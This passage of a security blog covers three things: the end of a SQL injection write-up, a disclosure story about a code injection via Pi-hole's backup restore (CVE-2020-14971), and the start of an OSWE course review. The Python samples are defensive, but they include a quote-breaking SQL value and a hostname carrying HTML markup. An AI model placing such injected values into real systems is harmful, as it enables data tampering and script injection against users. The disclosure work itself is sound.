<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7svvZIQqFpA0aWRFPRMfR9uEp5I-l8nkHV2jxgiSOIkdBoZwsn7_3Z5_Z2IL8ShXixWTw9o43Tt_gMECC_lhT9TPX5GCNbh1LBaA2og3CHcuNEfE0MjqzQ19elWjcZydH4VfzRmOSVy3t/s1600/13.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="417" data-original-width="900" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7svvZIQqFpA0aWRFPRMfR9uEp5I-l8nkHV2jxgiSOIkdBoZwsn7_3Z5_Z2IL8ShXixWTw9o43Tt_gMECC_lhT9TPX5GCNbh1LBaA2og3CHcuNEfE0MjqzQ19elWjcZydH4VfzRmOSVy3t/s640/13.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="MsoNormal">
<span style="font-family: inherit; font-size: large;"> 2.5) Click "Do Import" - you'll see the Error Based SQL injection.</span><br />
<span style="font-family: inherit; font-size: large;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjANUdklmTFIgLcH0aBiHikAst6LrVbZ6vqsWQ9OIqAhDTATmBrfzzufhVN2UumiMPO-eEjVC0ibcukbPP9hpewuDK_0UPBe14uRJTbGyG0KuC2KUhqdcP0Lqgg1ft6rk49IDVqU5yi8DRb/s1600/14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="196" data-original-width="899" height="137" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjANUdklmTFIgLcH0aBiHikAst6LrVbZ6vqsWQ9OIqAhDTATmBrfzzufhVN2UumiMPO-eEjVC0ibcukbPP9hpewuDK_0UPBe14uRJTbGyG0KuC2KUhqdcP0Lqgg1ft6rk49IDVqU5yi8DRb/s640/14.png" width="640" /></a></div>
<div class="MsoNormal">
<br /></div>
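<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: large;">The database error in step 2.5 is what a query built by string concatenation produces when an imported field contains quote characters. The following is an added example, not code from the affected application: it parses the tab-separated file from step 2.2 and runs the row through a concatenated INSERT and through a parameterized one. The admin table, the function names and the in-memory SQLite database are assumptions made for illustration.</span></span></div>

```python
import sqlite3

# Constructed sample: the header and the data row from step 2.2, tab-separated.
SAMPLE_IMPORT = "email\tloginname\tpassword\ntest2@test.com\t\"'testsql\ttest\n"
EXPECTED_HEADER = ["email", "loginname", "password"]


def parse_import(text):
    """Split the import file into one dict per data row, rejecting odd shapes."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    if not lines or lines[0].split("\t") != EXPECTED_HEADER:
        raise ValueError("unexpected header row")
    rows = []
    for row_no, line in enumerate(lines[1:], start=1):
        fields = line.split("\t")
        if len(fields) != len(EXPECTED_HEADER):
            raise ValueError(f"data row {row_no}: wrong number of fields")
        rows.append(dict(zip(EXPECTED_HEADER, fields)))
    return rows


def new_db():
    """Hypothetical admin table (assumption, not the application's schema).

    The password column only mirrors the file header; real code stores a
    password hash, never the imported value itself.
    """
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admin (email TEXT, loginname TEXT, password TEXT)")
    return db


def import_concatenated(db, rows):
    """'Before' form: field values are pasted into the SQL text.

    Returns the database error messages. Printing these back to the user is
    what makes the injection error based.
    """
    errors = []
    for r in rows:
        sql = (
            "INSERT INTO admin (email, loginname, password) VALUES "
            f"('{r['email']}', '{r['loginname']}', '{r['password']}')"
        )
        try:
            db.execute(sql)
        except sqlite3.Error as exc:
            errors.append(str(exc))
    return errors


def import_parameterized(db, rows):
    """Hardened form: values are bound as parameters, so quotes stay data."""
    db.executemany(
        "INSERT INTO admin (email, loginname, password) "
        "VALUES (:email, :loginname, :password)",
        rows,
    )
    return db.execute("SELECT loginname FROM admin").fetchall()


if __name__ == "__main__":
    sample_rows = parse_import(SAMPLE_IMPORT)
    print("concatenated :", import_concatenated(new_db(), sample_rows))
    print("parameterized:", import_parameterized(new_db(), sample_rows))
```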
<i><span style="font-family: inherit;">Creative Commons - Attribution-ShareAlike 4.0 International (CC BY-SA 4.0) - <a href="https://creativecommons.org/licenses/by-sa/4.0/">https://creativecommons.org/licenses/by-sa/4.0/</a></span></i></div>
</div>
</div>
<p><span style="font-size: x-large;"><b>Pi-hole Code Injection – CVE-2020-14971 – Story Time</b></span></p>
<p>Published 2020-06-23</p>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">A while ago, we had an internal discussion around people working from home and the technologies/products that could be implemented and/or bought to protect home users. This was due to the implementation of the nationwide lockdown which resulted in companies being forced to change their approach entirely to having employees work from home. <o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<span style="font-family: inherit; font-size: large;">During this discussion the Pi-hole was mentioned. Pi-hole is a very popular option for the more “tech savvy” home user and generally, anyone that’s tired of being spammed with random adverts on every website. You can find more information about it here <a href="https://github.com/pi-hole/pi-hole/">https://github.com/pi-hole/pi-hole/</a>.</span><br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">Since I had a Pi-hole installed already, I decided to take a look at this beautiful piece of ad blocking software in more detail, specifically reviewing the code and logic of the application. Because it’s open source and freely available, this was easily accomplished by downloading and installing the latest Pi-hole (v5.0 at the time).<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">It’s worth mentioning that a lot of vulnerabilities had already been found in this software. Some overlapped with findings that I had made, particularly during April and May, and those were rightfully allocated to the first people that reported the issues. With that being said, the Pi-hole is a popular target for researchers and adds a lot of value to people’s home and small office environments, so the more findings and fixes the better. I also wanted to focus on the latest version because of this.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><span style="font-size: large;">Initially, I had found a few critical security vulnerabilities, but many had been found and fixed already, others eventually required local shell access in some form, and some functionality had been changed over time, which solved those particular RCE issues too. I therefore looked at a few other vectors and decided to focus on one specific attack vector, which looked promising.</span><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<h2>
<b><span lang="EN-US" style="color: #353535; font-family: inherit;">Backup Functions:</span></b></h2>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">Settings.php has lots of functionality, one of which allows users to back up and restore (export and import) configurations of the Pi-hole with a limited set of files (teleporter tab). </span><br />
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglNhhw3mW08neSXNN_1PoEhIVyxrHWaqOBysJYAbU4FAWUvHg9ftssQELdj0Xpi5Hukk7-ttTCFg2BWrpJ6pvJvYyj9o4icEhZiNy9CfZ6p3qPqSrypAv7_T6DwNBIe_WxbLyU4Eo4I71P/s1600/Screen+Shot+2020-06-18+at+4.31.19+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="437" data-original-width="1006" height="278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEglNhhw3mW08neSXNN_1PoEhIVyxrHWaqOBysJYAbU4FAWUvHg9ftssQELdj0Xpi5Hukk7-ttTCFg2BWrpJ6pvJvYyj9o4icEhZiNy9CfZ6p3qPqSrypAv7_T6DwNBIe_WxbLyU4Eo4I71P/s640/Screen+Shot+2020-06-18+at+4.31.19+PM.png" width="640" /></a></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">This was interesting for me because when you export files, they are compressed in tar.gz format and saved. Upon decompression and by systematically reviewing each file that was saved, I found that there were several files which were useful and easy wins for RCE, in particular if no whitelisting and sanitising was taking place. However, those particular ones are not restored if you modify them, re-compress and upload to restore the backup.</span><br />
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg60pHTXF0c5H35b6bPbxUYnRanI4SEki9V_coimghoR5LPF8qj6CkuJebN2tLx0H41Y3ndjJSOKhMv6_0mtr4xAVWjGYu09IBiPQt8z6aUN_nqtvC8l_QFSuhQzNdP8irl0h8DCLy-9MsS/s1600/Screen+Shot+2020-06-18+at+4.35.31+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="255" data-original-width="944" height="172" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg60pHTXF0c5H35b6bPbxUYnRanI4SEki9V_coimghoR5LPF8qj6CkuJebN2tLx0H41Y3ndjJSOKhMv6_0mtr4xAVWjGYu09IBiPQt8z6aUN_nqtvC8l_QFSuhQzNdP8irl0h8DCLy-9MsS/s640/Screen+Shot+2020-06-18+at+4.35.31+PM.png" width="640" /></a></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">In this instance though, the affected files I found are dnsmasq.d configuration files and the adlist.json file. The dnsmasq.d/04-pi-hole-static-dhcp.conf file allows static DHCP leases, which link to MAC, IP and host. <o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">I modified the configuration file for dnsmasq.d initially, in which I added my own code for the host parameter. Once I did this, I recompressed the file accordingly and imported the file back in via teleporter:</span><br />
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRfq1diJZChftFHvO-VFfwNTn8GJ9_2FFUSTI6nBVPSqeDtkgEvbofaAoD1F5SKbF7HUy8PoPrtscCu8FpV6LrYJWykSG7yA07-kHwNz-roNAAt9uf5ZsL1nYFEu1h7GLsM28m5o99_p9f/s1600/Screen+Shot+2020-06-18+at+4.38.14+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="64" data-original-width="1228" height="32" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRfq1diJZChftFHvO-VFfwNTn8GJ9_2FFUSTI6nBVPSqeDtkgEvbofaAoD1F5SKbF7HUy8PoPrtscCu8FpV6LrYJWykSG7yA07-kHwNz-roNAAt9uf5ZsL1nYFEu1h7GLsM28m5o99_p9f/s640/Screen+Shot+2020-06-18+at+4.38.14+PM.png" width="640" /></a></div>
<span style="font-family: inherit;"></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><span style="font-size: large;">Upon browsing to the static DHCP leases section of the Pi-hole web interface, I could see my code was executing correctly, i.e. I had found a Code Injection vulnerability. </span><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFECwnHLey4wtTVFSYh0g7Mp09T2oJBLr1auI6hYhBmvhS0OJF8JZJLZoum4ApZcpLDopUXPjYIgQ7ApjLxaTp79tr-NyIElvR11aL1s_uOHSqobD0VCk9hUOCMWNvA8m7NwWtempv8v3S/s1600/Screen+Shot+2020-06-18+at+4.39.14+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="351" data-original-width="1327" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFECwnHLey4wtTVFSYh0g7Mp09T2oJBLr1auI6hYhBmvhS0OJF8JZJLZoum4ApZcpLDopUXPjYIgQ7ApjLxaTp79tr-NyIElvR11aL1s_uOHSqobD0VCk9hUOCMWNvA8m7NwWtempv8v3S/s640/Screen+Shot+2020-06-18+at+4.39.14+PM.png" width="640" /></a></div>
<span style="color: #353535; font-family: inherit;"><br /></span>
<span style="color: #353535; font-family: inherit;"><span style="font-size: large;">The same then applied to adlists.json and other parameters in other files, because the files were not being properly checked upon upload. They also just overwrote whatever was previously there, and therefore your code executed accordingly:</span></span><br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG1GmplenHq7rmbWtRjeTy492e1QfFcnEFUSOg09i0PeB3YYgjB3H_YIvSRdQS95kC3753-do_jF3rT57gumNRc8jIoQVxRNP8CvCnRbVyKZJg99DxHLVA4VucqIFsAwtbLB1rIx_R0bGR/s1600/Screen+Shot+2020-06-22+at+10.13.18+PM.png" imageanchor="1" style="font-family: cambria; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="67" data-original-width="910" height="46" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhG1GmplenHq7rmbWtRjeTy492e1QfFcnEFUSOg09i0PeB3YYgjB3H_YIvSRdQS95kC3753-do_jF3rT57gumNRc8jIoQVxRNP8CvCnRbVyKZJg99DxHLVA4VucqIFsAwtbLB1rIx_R0bGR/s640/Screen+Shot+2020-06-22+at+10.13.18+PM.png" width="640" /></a></div>
</div>
<div class="MsoNormal" style="font-family: Cambria; margin: 0in 0in 0.0001pt;">
<div class="MsoNormal" style="font-family: Cambria; margin: 0in 0in 0.0001pt;">
<br /></div>
</div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><span style="font-size: large;">Browse to host/admin/groups-adlists.php and you should get the ‘Adam popup’:</span><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkL4xhcy00Ir0k_5N5b41Wau-Azdckp9X4yqI7nqToiNy8pLw2uHLuxxgHMARkOxL-xcimS2fWjUbn35YVSQF3yPXCZplqB31krG5J2KMfL9CEMu_OvBuXDKezufBsmlSbCAnppzJaPQvO/s1600/Screen+Shot+2020-06-18+at+4.45.47+PM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="610" data-original-width="1264" height="308" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkL4xhcy00Ir0k_5N5b41Wau-Azdckp9X4yqI7nqToiNy8pLw2uHLuxxgHMARkOxL-xcimS2fWjUbn35YVSQF3yPXCZplqB31krG5J2KMfL9CEMu_OvBuXDKezufBsmlSbCAnppzJaPQvO/s640/Screen+Shot+2020-06-18+at+4.45.47+PM.png" width="640" /></a></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
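<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">The root cause described above is that restored files were written back without their contents being checked, and the values were later rendered in the admin pages. The following is an added example, not Pi-hole's own code or its actual fix: it audits the static lease file inside a backup archive before restore and HTML-encodes values at output. It assumes lease lines of the form dhcp-host=MAC,IP,hostname; the function names and the sample archive are constructed for illustration.</span></div>

```python
import html
import io
import ipaddress
import posixpath
import re
import tarfile

LEASE_FILE = "dnsmasq.d/04-pi-hole-static-dhcp.conf"
PREFIX = "dhcp-host="
MAC_RE = re.compile(r"(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}")
LABEL_RE = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def valid_hostname(name):
    """Allow only letter/digit/hyphen labels separated by dots (allow-list)."""
    if not name or len(name) > 253:
        return False
    return all(LABEL_RE.fullmatch(label) for label in name.split("."))


def check_lease_line(line):
    """Return None for an acceptable lease line, else the reason it is rejected."""
    if not line.startswith(PREFIX):
        return "not a dhcp-host directive"
    fields = line[len(PREFIX):].split(",")
    if len(fields) != 3:
        return "expected MAC,IP,hostname"
    mac, ip, host = fields
    if not MAC_RE.fullmatch(mac):
        return "bad MAC"
    try:
        ipaddress.ip_address(ip)
    except ValueError:
        return "bad IP"
    if not valid_hostname(host):
        return "bad hostname"
    return None


def audit_archive(data):
    """Scan a tar.gz backup (bytes); return (line_no, reason, line) per rejected line."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for member in tar:
            if not member.isfile() or posixpath.normpath(member.name) != LEASE_FILE:
                continue
            text = tar.extractfile(member).read().decode("utf-8", "replace")
            for line_no, line in enumerate(text.splitlines(), start=1):
                line = line.strip()
                if not line or line.startswith("#"):
                    continue
                reason = check_lease_line(line)
                if reason:
                    findings.append((line_no, reason, line))
    return findings


def render_lease_row(mac, ip, host):
    """Second layer: encode every value when it is written into the page."""
    cells = "".join(f"<td>{html.escape(v, quote=True)}</td>" for v in (mac, ip, host))
    return f"<tr>{cells}</tr>"


def build_sample_archive():
    """Constructed sample: one clean lease and one whose hostname carries markup."""
    conf = (
        "dhcp-host=AA:BB:CC:DD:EE:01,192.168.1.10,printer\n"
        "dhcp-host=AA:BB:CC:DD:EE:02,192.168.1.11,<b>laptop</b>\n"
    ).encode()
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        info = tarfile.TarInfo(LEASE_FILE)
        info.size = len(conf)
        tar.addfile(info, io.BytesIO(conf))
    return buf.getvalue()


if __name__ == "__main__":
    for finding in audit_archive(build_sample_archive()):
        print("rejected:", finding)
    print(render_lease_row("AA:BB:CC:DD:EE:02", "192.168.1.11", "<b>laptop</b>"))
```

A restore routine would refuse the whole archive when the audit returns any finding, rather than importing the lines that passed.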
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">There are more examples; however, it’s more of the same as what has been discussed above. I would also like to mention that the Pi-hole is an amazing piece of software, built by people who really care for the community. Please support them and donate. All the responses (especially from Adam) were really quick and things were patched exceptionally quickly.<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: #353535; font-family: inherit; font-size: large;">You can browse all the fixes, comments and progress of patching by going here:<o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="color: blue; font-family: inherit; font-size: large;"><span style="color: windowtext; text-decoration: none;"><a href="https://github.com/pi-hole/AdminLTE/commit/c949516ee15fa6a9b0c8511cc4c4d6b0893f3e69" style="color: purple;">https://github.com/pi-hole/AdminLTE/commit/c949516ee15fa6a9b0c8511cc4c4d6b0893f3e69</a></span><o:p></o:p></span><br />
<span style="color: blue; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: inherit;"><span style="color: blue; font-size: large; text-decoration: none;"><a href="https://github.com/pi-hole/AdminLTE/pull/1443#issuecomment-640920508" style="color: purple;">https://github.com/pi-hole/AdminLTE/pull/1443#issuecomment-640920508</a></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="color: blue; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: inherit;"><span style="color: blue; font-size: large; text-decoration: none;"><a href="https://github.com/pi-hole/AdminLTE/commit/8f6e1365b6dec0ae1aa0b0b15b102c9133f347e5" style="color: purple;">https://github.com/pi-hole/AdminLTE/commit/8f6e1365b6dec0ae1aa0b0b15b102c9133f347e5</a></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="color: blue; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: inherit;"><span style="color: blue; font-size: large; text-decoration: none;"><a href="https://github.com/pi-hole/AdminLTE/pull/1443#issuecomment-643830404" style="color: purple;">https://github.com/pi-hole/AdminLTE/pull/1443#issuecomment-643830404</a></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span style="color: blue; font-size: large;"><br /></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<span lang="EN-US" style="font-family: inherit;"><span style="color: blue; font-size: large; text-decoration: none;"><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14971" style="color: purple;">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14971</a></span></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt;">
<br /></div>
<p><span style="font-size: x-large;"><b>{Certification Review} - OSWE - Staff Review</b></span></p>
<p>Published 2020-05-28</p>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Recently, Offensive-Security released an online version of their certification called “Offensive Security Web Expert” aka OSWE. Having already experienced and successfully obtained several other certifications from Offensive Security such as OSCP and OSCE, I was curious and intrigued to give the OSWE course a try as well.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span style="font-family: Candara; font-size: 11pt;">I decided to choose the 2-month package option for the course called “Advanced Web Attacks and Exploitation” and, due to other commitments, I was able to request, and was granted, a minor 15-day extension.</span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">After watching the videos and reading through the course material, I was very impressed by the content of the course, as it contained detailed information and analysis on certain in-depth attacks.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">The course followed a white-box testing approach which was based on source code review, by reading the code of the web application in order to find and exploit potential vulnerabilities.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">The course material included several labs with web application software installed on them and by following the content provided in the course material, exploiting the machines was relatively easy.<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">Before embarking on this course, I would recommend that you have a good understanding of the following skills:<o:p></o:p></span></div>
<div class="MsoNormal" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 8pt; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><b><span lang="EN-US" style="font-family: Candara; mso-bidi-font-family: Candara; mso-fareast-font-family: Candara;"><span style="mso-list: Ignore;">1.<span style="font: 7.0pt "Times New Roman";"> </span></span></span></b><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">Python scripting language:<o:p></o:p></span></b></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;">The course will require you to have a solid understanding of, as well as experience with, Python scripting, as it is used for automating the process of exploiting vulnerabilities as well as automating exploits.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="-webkit-text-size-adjust: auto; -webkit-text-stroke-width: 0px; caret-color: rgb(0, 0, 0); color: black; font-family: Calibri; font-size: 11pt; font-style: normal; font-variant-caps: normal; font-weight: normal; letter-spacing: normal; line-height: 15.693333625793457px; margin: 0in 0in 0.0001pt 0.5in; orphans: auto; text-align: start; text-decoration: none; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<span lang="EN-US" style="font-family: Candara;"><br /></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><b><span lang="EN-US" style="font-family: Candara; mso-bidi-font-family: Candara; mso-fareast-font-family: Candara;"><span style="mso-list: Ignore;">2.<span style="font: 7.0pt "Times New Roman";"> </span></span></span></b><!--[endif]--><b><span lang="EN-US" style="font-family: Candara;">Other programming languages:<o:p></o:p></span></b></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l1 level1 lfo1; text-indent: -.25in;">
<b><span lang="EN-US" style="font-family: Candara;"><br /></span></b></div>
